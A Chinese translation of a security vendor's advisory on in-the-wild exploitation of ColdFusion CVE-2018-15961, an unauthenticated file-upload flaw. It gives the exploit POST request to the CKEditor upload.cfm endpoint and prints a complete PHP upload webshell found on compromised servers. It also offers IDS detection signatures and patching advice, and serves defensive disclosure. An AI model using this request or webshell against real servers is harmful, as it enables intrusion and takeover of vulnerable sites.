内容简介:如果你的企业运行着ColdFusion网络版,那么你可能需要检查一下你的服务器了。Volexity研究人员近期发现Adobe ColdFusion CVE-2018-15961的漏洞利用。Adobe已经发布了该漏洞的补丁,并且没有公布该漏洞的详情和PoC。Volexity检测到的攻击活动中,中国某APT组织直接上传了中国菜刀webshell来入侵有漏洞的ColdFusion服务器。因为目标服务器没有升级adobe发布的更新补丁。该漏洞CVE编号为CVE-2018-15961,影响版本包括ColdFusio
如果你的企业运行着ColdFusion网络版,那么你可能需要检查一下你的服务器了。Volexity研究人员近期发现Adobe ColdFusion CVE-2018-15961的漏洞利用。Adobe已经发布了该漏洞的补丁,并且没有公布该漏洞的详情和PoC。
Volexity检测到的攻击活动中,中国某APT组织直接上传了中国菜刀webshell来入侵有漏洞的ColdFusion服务器。因为目标服务器没有升级adobe发布的更新补丁。该漏洞CVE编号为CVE-2018-15961,影响版本包括ColdFusion 11、ColdFusion 2016、ColdFusion 2018等4年内发布的所有版本。
Adobe的ColdFusion web应用开发平台一直是APT组织攻击的目标。主流的ColdFusion包括WYSIWYG 富文本编辑器CKEditor。在过去的ColdFusion版本中,Adobe打包了原来的FCKeditor。Adobe在决定用FCKeditor替代CKEditor时,意外引入了一个新的非认证文件上传漏洞。该漏洞与2009年发现的FCKeditor非认证文件上传漏洞非常类似。
APT组织利用CVE-2018-15961漏洞
Volexity在Adobe发布该漏洞安全更新后约2周发现了该漏洞的在野利用。 可以通过一个简单的HTTP POST请求到upload.cfm文件进行利用,upload.cfm是没有限制的,也不需要任何的认证。下面是解释该漏洞利用的POST请求:
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?action=upload HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: multipart/form-data; boundary=—————————5b12d3a3190134 Accept-Encoding: gzip, deflate Content-Length: 9308 Host: <hostname> Pragma: no-cache Connection: close —————————–5b12d3a3190134 <redacted>
Volexity发现APT组织利用来漏洞来上传JSP版本的中国菜刀,并在允许通过CKEditor上传前在受感染的web服务器上执行命令。相关的配置文件settings.cfm如下所示:
<cfset settings.disfiles = “cfc,exe,php,asp,cfm,cfml”>
CVE-2018-15961利用
在识别APT利用CVE-2018-15961后,Volexity检查了许多有网络连接的ColdFusion web服务器。这些服务器隶属于不同的组织,包括教育机构、州政府、医疗研究机构等。这些站点都有尝试webshell上传的痕迹。Volexity不能确认这些实例中是否有漏洞被滥用的情况。但是基于受感染的服务器上的文件,研究人员相信有非APT组织成员的用户在9月11日前已经识别了该漏洞。被入侵的网站上都有以下两个目录之一:
-
/cf_scripts/
-
/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/
大多数攻击实例中,这些文件的最后修改日期为6月2日或6月6日。许多网站上都有增加up.php.fla文件失败的遗留代码。.fla扩展并不常用,可能是因为攻击者没有发现.jsp文件扩展是允许上传的。
<?php $files = @$_FILES[“files”]; if ($files[“name”] != ”) { $fullpath = $_REQUEST[“path”] . $files[“name”]; if (move_uploaded_file($files[‘tmp_name’], $fullpath)) { echo “<h1><a href=’$fullpath’>OK-Click here!</a></h1>”; } }echo ‘<html><head><title>Upload files…</title></head><body><form method=POST enctype=”multipart/form-data” action=””><input type=text name=path><input type=”file” name=”files”><input type=submit value=”Up”></form></body></html>’; ?>
许多受影响的网站都含有一个来自黑客组织TYPICAL IDIOT SECURITY的HTML index文件。网页内容如下:
Hacked by AnoaGhost – Typical Idiot Security #together laugh in ur security since 2k17# We are:~•Khunerable – SPEEDY-03 – PYS404 – Mirav – Grac3 – AnoaGhost – Jje Incovers – Panataran – magelangGetar – Kersen.id•
该黑客组织好像来自印度尼西亚,其成员AnoaGhost与支持ISIS的黑客组织有关联。
签名
以下入侵检测系统签名可以用于检测CVE-2018-15961滥用:
Suricata: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex – ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;) Snort: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:”Volex – ColdFusion Unauthenticated Upload Attempt (upload.cfm)”; flow:to_server,established; content:”POST”; http_method; content:”upload.cfm?action=upload”; nocase; http_uri; sid:2018093003;)
建议
如果你的ColdFusion服务器有网络连接,那么可以检查一下日志文件和目录看是否有可疑文件。如果发现了可以的日志记录或文件,需要进行进一步的分析。
Volexity建议用户尽早更新Adobe ColdFusion补丁。最好的办法是在管理员面包中配置补丁升级。下图是Server Update > Updates > Settings的默认设置:
Volexity建议对配置进行如下修改:
-
开启Automatically Check for Updates(自动更新)选项
-
将Check for updates every 10 days(检查更新的时间)从10天修改为1天,这样每天都会检查更新
-
配置正确的email,以接收安全更新通知。
Volexity同时建议所有ColdFusion管理员的访问限制为IP白名单,以减小攻击面。
总结
Adobe ColdFusion存在远程利用漏洞已经很长时间了,也是国家级攻击者非常喜欢的目标。补丁管理是预防此类攻击的非常有效的办法。但Volexity建议用户检查使用的版本并尽快更新到最新版。
https://www.volexity.com/blog/2018/11/08/active-exploitation-of-newly-patched-coldfusion-vulnerability-cve-2018-15961/
以上所述就是小编给大家介绍的《CVE-2018-15961在野利用》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- 火狐浏览器爆在野利用0day,官方紧急更新修复
- 谷歌安全团队公布内部追踪的“已在野利用0day”列表
- CVE-2018-9206出现在野利用 多网站被挂马致搜索跳转博彩网站
- LimeRAT在野外传播
- [译] Chrome 在野零日漏洞
- 多款光纤路由器设备在野0-day漏洞简报
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。